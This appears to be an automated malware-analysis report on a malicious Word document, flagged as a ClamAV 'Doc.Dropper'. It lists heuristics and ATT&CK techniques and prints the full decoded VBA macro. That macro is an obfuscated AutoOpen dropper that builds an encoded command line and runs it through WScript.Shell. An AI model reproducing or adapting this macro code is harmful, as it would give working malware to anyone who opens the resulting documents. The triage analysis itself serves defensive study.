Verdict: MALICIOUS
Risk Score: 310

## Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The macros use WScript.Shell and CreateObject to execute arbitrary commands, as indicated by the critical heuristics for Shell() and WScript.Shell usage. An AutoOpen macro is present, so the code runs as soon as the document is opened. The primary function appears to be downloading and executing a secondary payload, as suggested by the ClamAV detection name 'Doc.Dropper'.
## Heuristics (10)

- **ClamAV: Doc.Dropper.Valyria-6665595-0** (critical, `CLAMAV_DETECTION`): ClamAV detected this file as malware: Doc.Dropper.Valyria-6665595-0.
- **VBA macros detected** (medium, `OLE_VBA_MACROS`, 4 related findings): Document contains VBA macro code.
- **WScript.Shell usage** (critical, `OLE_VBA_WSCRIPT`): WScript.Shell usage. Matched line in script: `Error 21614 * wbHaSs * DfiWX / wlfjDM NtLmiKwO = CreateObject("WScript.Shell") _ . _`
- **CreateObject call** (high, `OLE_VBA_CREATEOBJ`): CreateObject call. Matched line in script: `Error 21614 * wbHaSs * DfiWX / wlfjDM NtLmiKwO = CreateObject("WScript.Shell") _ . _`
- **VBA p-code auto-exec with execution tokens** (high, `OLE_VBA_PCODE_AUTOEXEC_EXEC`): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- **AutoOpen macro** (low, `OLE_VBA_AUTOOPEN`): AutoOpen macro. Matched line in script: `Attribute VB_Name = "YBEISfwZXXh" Sub AutoOpen() On Error Resume Next`
- **Reference to Windows Script Host** (high, `SC_STR_WSCRIPT`): Reference to Windows Script Host.
- **Legacy WordBasic auto-exec macro marker** (medium, `OLE_LEGACY_WORDBASIC_AUTOEXEC`): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- **Suspicious extracted artifact** (medium, `EXTRACTED_FILE_STATIC_TRIAGE`): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- **Embedded URL** (info, `EMBEDDED_URL`): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
## Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10584 bytes |

Details for macros.bas:

- SHA-256: 0eee9c760f8f49623ff34a60a6db5dfd8c7d617e0b6879626e1cf64fc24c4636
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely. 144 of 226 identifiers look randomly generated (e.g. 'znLKzJzoudlYA'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "znLKzJzoudlYA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ApWzUKnRosNSQ"
Function AAQTwY()
On Error Resume Next
Error TsBOk * PzbIr / EGIrlR * tBdawp
Error 80496 * XVtGNU / GJcGUz / ibFhc
Error cdirr / ApSFY * Jcsqw * cVpkE
Error mGlMo / iRXmB * KVjkTi / 41263
azsTMArRGVs = "Md /V^" + " " + "^ " + "^" + " /" + "c " + " " + Chr(0 + 2 + 1 + 4 + 27) + " ^se^t"
Error 86001 * uXftQL
Error 65237 / 51968 * vRDLS / MCftpY
Error YnNiX / fbfhw
Error 48347 * BOrfwL * 84365 / lCSPk
iPhLN = " ^ ^ ^" + " ^6^bv" + "=AACA^g" + "^A^A" + "IAAC^" + "A^gA^"
Error CnWmM * zdJdWH
Error 49727 * KwZVd
TqkZmJPM = "A^" + "I^A^AC^" + "A^g^AA" + "^I^" + "A^A" + "CA^" + "g^" + "A^" + "AI^A^A"
Error wAFiQf * BqYLln * 4118 * sPcUD
Error IXMki / hjHdFJ * 78225 * IFmzEB
TcNlBV = "CA^g^AA" + "^IA" + "ACA^gA^" + "Qf^A" + "0H^A7^B" + "AaA^M^" + "G^A0" + "^B^QY^" + "AMG" + "A" + "9^B^wOA"
Error AMbLf * UBoFn
Error DwGwti / hUhntR
Error 13147 * IrBXkJ
HKPspJlirRN = "s^" + "G^AhB" + "QZ^AIHA" + "^" + "i^Bw^OA" + "^M"
Error zMPHSO / VaqFs
Error qaVcff / SOavXR
Error 58038 * RhbBl
Error FvRXf * hTUOGX * TbTjj * 93335
jCjmN = "F^AuB" + "^g^" + "YA^" + "QC^A^" + "g^" + "A^Qb^" + "A^" + "UGA^0B^" + "Q" + "^S^A^0" + "C^" + "A" + "^lB"
Error nUPbIH / OZHWz
Error 13590 / 28029
Error YGvni * oMuwWP
Error jiHTJ / BwhfM
Error 40892 / zzWLc
lPzsiUdjqEQ = "^w" + "^aA^8" + "GA2^B^g" + "^bA" + "^" + "k" + "EA7A" + "^QKA" + "^" + "M"
Error zGbKQV / csXGZ
Error 87085 / PHUAFb * 4769 / ztAtM
Error 36167 / FKjnQf
Error dKDTwP / 87355 / MQRjw / 59626
Error 78720 / pYzJNh
bskdYj = "F^A" + "^uBg^YA" + "QCAg" + "A^AL" + "A0E^A" + "vB^Q" + "W^AQC" + "AoA^QZA" + "^w^GA^" + "p^B^"
Error QjXvXi / kzihv
Error lbRPcK * DvQAjj
LzahjSi = "g" + "R^A^Q" + "G^Ah^B" + "wbAwG^A" + "u^" + "B^wdA8" + "G^AEB" + "g^LAo^"
Error 60966 * 19933 * qOcFY / 41213
NYAswfQFLbJ = "G^A^U" + "^BQ^WA" + "QC^A^7^" + "BQ^" + "eAIHA" + "^" + "0Bw^eA" + "^kC" + "^AM" + "BgQ" + "^AM^E^A" + "^kA^A^I" + "A^4^"
AAQTwY = azsTMArRGVs + iPhLN + TqkZmJPM + TcNlBV + HKPspJlirRN + jCjmN + lPzsiUdjqEQ + bskdYj + LzahjSi + NYAswfQFLbJ
Error 24984 * rRluP * uPGhpV * csNWw
Error XlHpE * isSCK / BQOGk / kWWls
Error QBwsp * kiPMHJ
End Function
Function nkWaqCkJW()
On Error Resume Next
Error 30627 / 23549 * vltwpz / 58476
Error TRzrF / IwoQfR
Error jGXzl / QvpFK / pEFBwD * hUnNl
sDmuNHIlkD = "GA^p^B" + "^AI^A" + "0^E" + "AvBQW^A" + "QC^Ao" + "^AAaA" + "^M" + "G^A^h"
Error apOMFp / zjdbzE / 15638 * Llfiz
Error VGXvhi / GknLC * 26645 * YjnzhW
Error 78341 * SmtsmV * AVzDM / GrZhj
nzHbKrHiLqL = "^BQZ" + "^A^I" + "HAvBgZ^" + "A^s" + "^DAnA" + "QZ" + "AgHAl" + "B^gLAcC" + "^Ar^Ag^" + "W^" + "Ak^"
Error 46393 / IGjjo
KVZpGBEDc = "F^A" + "^i^B^" + "AJ^AsC" + "^A" + "n^" + "A"
Error 32301 * cdiRna * sRipjN * IQrdpb
Error 88762 / kTGMpt
Error pdUIoJ / FZatn / 72944 / utmEr
Error MOPBq * 49662
TAvChlzrOmB = "^AX" + "AcC^" + "ArAwY^" + "A^" + "kG" + "A^s" + "B" + "^g^YAU^" + "HAwB^gO" + "A^Y"
Error lWMNv * ihfzzh * KzhXd * wiSqU
Error 63377 * hILzF
sKhNblmb = "H" + "A^u^" + "BQZA^QC" + "A^9A" + "wU" + "A^4G" + "Ai" + "B" + "AJ^" + "A" + "s" + "^D^AnAA" + "N^AI^D^"
Error npbTj * FmUPwt
Error OlmmO / CDWXw / ZkTKb / oSwib
OiavjV = "A" + "^yAw" + "J^A" + "A" + "C^A9" + "A^AI" + "^Ao^F^A" + "^ZB^g^Y" + "^AQC" + "^" + "A7A^QKA" + "cC^" + "A"
Error Gvjiar * KjzOYY / 71240 * hJmkX
Error 90558 / mttInl / 41436 * cjiorr
Error MGcJb * tNOHO * TqZjJz / abakq
Error iEVXRQ * YGqFSM * 14861 / cMMSvl
XGiIIZ = "^A^B" + "^wJ" + "AgC" + "^A" + "^0^B^Q" + "aA^" + "wG^Aw^" + "Bw^U^A" + "4CAn^" + "AQM"
Error 70985 / UTpcZ
XUiaiIu = "^" + "Ac^H^" + "A0" + "^A^gMAo" + "^FA^" + "H^BgN^"
Error OOHBK / ZOtCDw
Error 39691 / UoqMM / 15239 / GicoWz
Error 84126 * AiEHRa
YKsCf = "A8C^AvB" + "g" + "b^A4CA^" + "z^B" + "wb^A" + "w^G^A" + "lBAaA4" + "CA0^Bw"
nkWaqCkJW = sDmuNHIlkD + nzHbKrHiLqL + KVZpGBEDc + TAvChlzrOmB + sKhNblmb + OiavjV + XGiIIZ + XUiaiIu + YKsCf
Error lkFrvz / NdKjvW / tWrsOF / 2650
Error ClsvGv * IrRjG
Error AlXNP / BDLNzi * zJikWz / vUrAWW
Error fpQoDw * 98003
Error zzYcj / EuOfw / AtwzDZ / uJvNjj
End Function
Function TGYwfRXiBE()
On Error Resume Next
Error 92496 / HhOKYW
Error 3840 / luArSm
Error 58475 / iHufa
BcCJa = "c^" + "AUGA" + "0BwL" + "^" + "A^8" + "C^A^" + "6A^" + "AcA^Q^H" + "^A"
Error 94287 / vKatG
Error 17260 / SnnRN * lWrwA / RWsrQQ
Error 51186 * suoLPD
Error 19923 / zWLXo / 33197 / wmcLS
ARANGbrCiE = "0" + "BA^a^A^" + "A^EA^1" + "^Bw^LA" + "^" + "8G^" + "Aj^B^" + "gL" + "^" + "A^0G" + "A" + "v^" + "Bw^Y"
Error 85374 / YJlct * QzwfNz / 37867
Error 76858 * AculvC * 13974 * sWcMY
SknmGwAZaX = "A4C" + "AuBw" + "bAk" + "G^" + "A^0^B"
Error STwjTc * mLGvjH
Error 15567 * cYqwod
Error 22503 / iKdjLc
Error 41828 / ZjWzD * 48960 * jFVqDz
AwIjbj = "w" + "YA^U^GA" + "^0^BwbA" + "I^H^A" + "^wB^wb^" + "A^kGA" + "2^Bw" + "^"
Error 61894 / cuwFzp / 74399 / zLbGcN
Error aMADYW * CoYEG * 31105 * sdPdw
Error ZJNlkG / 12477
Error jwjAIL / sOmkF
HvRKw = "LA" + "^8C^A6^" + "A^AcAQ" + "H^A" + "^" + "0"
Error RtrciW * 25040 / 46961 * lLkNM
Error Pzbtf / ufomz / EfjRn * rKFhv
jYHPjrPX = "B" + "A^a" + "^" + "A^A^EA0" + "^A^wZ" + "^Aw^E^A" + "vA^Q^b" + "^A^8^G" + "Aj" + "B^" + "gLA"
Error RIBZE / ESSBcP / 29444 / BcINQC
OZthQwavt = "Y" + "H^A^l^" + "BAZ^" + "A^gGA" + "z^" + "B^Qa^A4" + "^G^Av" + "^B"
Error 31256 * csuVha * mRAPnw * MLnKQ
Error 69825 / zCJHE / nqBMsR / MnilrJ
Error 96541 / 28716
HIMdrUv = "^A^d^A4" + "CA^" + "l" + "Bw" + "ZAEG" + "^" + "Aw" + "B^" + "Q" + "^" + "Z^A^0^" + "G^A" + "v^B^Aa"
Error 60768 * AFOsov * 99612 * vsMZW
Error 98497 / wDvfOA / EYYLu * ijubH
Error 66292 * IXwRdR
Error LVPqW * PTAiA
AqupuREt = "^A0C" + "A^4^B^Q" + "YA" + "Q" + "^HA"
Error QjFIM * RzOvQ
cRjNNBOVr = "6B^w" + "^bA^8" + "C^" + "Av^A^g" + "^O" + "^AAH^A" + "0B^A^d"
Error 62363 * 96432
Error idiMDw / nRUbb
Error 94648 * QoHNM / 40289 * mFOHT
FAGWO = "^A" + "^gG^AA" + "BA^T^As" + "G^AyAw^" + "YA^"
TGYwfRXiBE = BcCJa + ARANGbrCiE + SknmGwAZaX + AwIjbj + HvRKw + jYHPjrPX + OZthQwavt + HIMdrUv + AqupuREt + cRjNNBOVr + FAGWO
Error iVmzRD * 54111
End Function
Function CZwToYDn()
On Error Resume Next
Error 75329 * VvopW
Error PjBZkB / iqcwv / dRrlGp * 52389
Error 96081 * jtaKzJ
Error sRUKm * Jkkin
AjWifqfQiS = "I" + "^G^A0A^" + "w" + "^L" + "A"
Error 18551 * KXDED
Error OTRuUf * rPUsM
TWnopnuq = "UHAlBg" + "L" + "^A" + "MH^A^" + "y^B^Q^d" + "A^8^" + "GA^s^" + "B^wb^A" + "MG^Au" + "^B^Q"
Error 16055 / iRbWF
Error 83519 / pWcQmv
lJdHKZbNL = "^ZA^YH" + "^A^lB" + "wcA^4" + "C^Ak^B" + "^A^" + "bA^kG" + "A1B^gY" + "^AE"
Error 62754 / DBtsF
Error tSTUm * mBFZm * NbVcjF / CuETPz
Error aHZmMz * LaYPCT
Error 27268 / WSTTki
hXUQrwsksTw = "G" + "Ay^BQZA" + "QH" + "A" + "v^A"
Error 74118 * bfowD * GIMuf * 74580
Error QPuDQC * 57386
zlNOAfa = "^wLA" + "^oD" + "A^" + "wB^" + "A^d" + "^AQ^HA" + "^" + "oBA^Q^"
Error 44287 * 94885
Error MKsiLz / WRWbU
Error KdTBjs / CUnVwk / 57692 * 28144
Error 85966 / jYFTj
Error BHutw / MUmWH
NXFErTT = "AkH" + "^AvA" + "^Qb" + "A8" + "^" + "GA^j^B^" + "g^LAE^" + "G^A^2" + "^B" + "^Qa^A" + "Q" + "H^A^"
Error 26009 / nKpFM
Error aHSFa / zDMJG
Error 94259 / iCcUl
FQUXDrdZ = "yB" + "w^b^AAH" + "^A^l" + "^B" + "^" + "AZ^AE" + "G^Aw^" + "Bw"
Error 21010 * lwnDHj / 17576 / zFWvz
Error hEHNk * qlPcjI
Error 76265 * XaBGZG
Error qUDvG * aaiVob
IFuapz = "^b^A^" + "I" + "^H" + "^AuBwb^" + "AkGA^" + "o^Bwc^" + "A^EG^" + "A^" + "mB^Q^" + "Y" + "^A^" + "k^GA^t^"
Error EFfIXW * bvdYO
Error 72242 / JMsIL * AAPmn / HRhNou
Error XAfFOk * DizLqG
UsbwCTso = "B^wL^" + "A^8C^" + "A^6A" + "^A" + "cAQ" + "H^A0" + "^B" + "^A^a^A" + "c" + "CA9AAT" + "A^I^E^" + "A^" + "D"
CZwToYDn = AjWifqfQiS + TWnopnuq + lJdHKZbNL + hXUQrwsksTw + zlNOAfa + NXFErTT + FQUXDrdZ + IFuapz + UsbwCTso
Error WANvA / jwjPjq / 43879 * MVcUB
End Function
Function ZAZFaKiQqLI()
On Error Resume Next
Error 80663 / 52489 / 92614 * wNRwBM
Error UijZR / DOPwf
Error PmLfN / vUDiX * 13554 * kwVrM
JFSLiBTWW = "BA^JA" + "s" + "DA^0" + "Bgb^A^U" + "G"
Error HhBqP / FjbHD / lMQvGp * AwkGmN
pVUjzo = "^A" + "pBA^b" + "^" + "A^MEA^" + "iB" + "^Q" + "Z^" + "Ac^F" + "Au^A" + "A^d" + "^A" + "^UGA"
Error 64274 / 9052
mCikrYI = "O^BAIA^" + "Q" + "^HA" + "^" + "jB^Q^Z^" + "AoGA" + "iB^w" + "bA0" + "C^A^3^" + "B^Q^"
Error 38954 * cdPUAw
Error 8101 / iBbGs / 43240 * HhhQlj
Error oDZVc / rzTrp * VdWaO * KBYbVD
TswpwBjJ = "Z^A" + "^4^GA9A" + "^" + "g^aA^Q" + "^F" + "AZ^B^A^" + "J^ ^e^" + "-" + " ^l^l^" + "e" + "^hs"
Error NNDPzG * FXmOjN / 65262 * lYMIw
Error wuYVpt * saloqH / 80473 * oJcNWi
DQTzsvVbI = "rew^o" + "^p& " + " ^f^O" + "r /^L " + "%^w ^i" + "n ( " + "^1" + "^013^ ^" + " ^ -^1" + "^" + " ^ ^ " + "0)^D"
ZAZFaKiQqLI = JFSLiBTWW + pVUjzo + mCikrYI + TswpwBjJ + DQTzsvVbI
Error uzMfN / HntcQ / qiRuH / McrXaf
End Function
Function UkMWDn()
On Error Resume Next
Error jjVCq * IaphSf / dBwfY * ziKSO
kfRnUt = "^O s" + "^e^t ^m" + "^bS=!^" + "m^bS!!^" + "6^bv:~ " + " %^w" + ", 1!" + "&" + "^I^f" + " " + "%^w =="
Error YXZjZd / bDXZa
Error auGjlZ * 41408
Error 66380 / bNoAJ
TfpJmjlLn = " " + "^" + "0 C^" + "A^l" + "L" + " %" + "^m^bS" + ":^*" + "^mbS^" + "!^"
Error iziZpr / FmQaiR * AKNvwZ * tBpIlW
Error wFjDQA * BjCzYF / 96990 / PajEZD
Error NhwLYA * maDJp
Error IiUjQ * 50180 * qiELl * vpREVv
JiKzIjTtOE = "=" + "% " + " " + Chr(0 + 2 + 1 + 4 + 27) + " "
UkMWDn = kfRnUt + TfpJmjlLn + JiKzIjTtOE
Error iTtwuY * rpjzit * oEGYN * 43002
End Function
Attribute VB_Name = "YBEISfwZXXh"
Sub AutoOpen()
On Error Resume Next
Error rONqm * CJQtzO
Error 48152 * NBlXc
Error 21614 * wbHaSs * DfiWX / wlfjDM
NtLmiKwO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(12 + 4 + 7 + 5 + 39) + OhrOYobRKQ + NukjzBt + AAQTwY + nkWaqCkJW + TGYwfRXiBE + CZwToYDn + ZAZFaKiQqLI + UkMWDn + XINXMRiRpSFu + IvhiVpbowuUMTR, 462569852 - 462569852)
Error ZJiKS * zwNLP * 82992 / 82141
Error 50357 * OhnqYd / LWwAUw * KXvbkQ
End Sub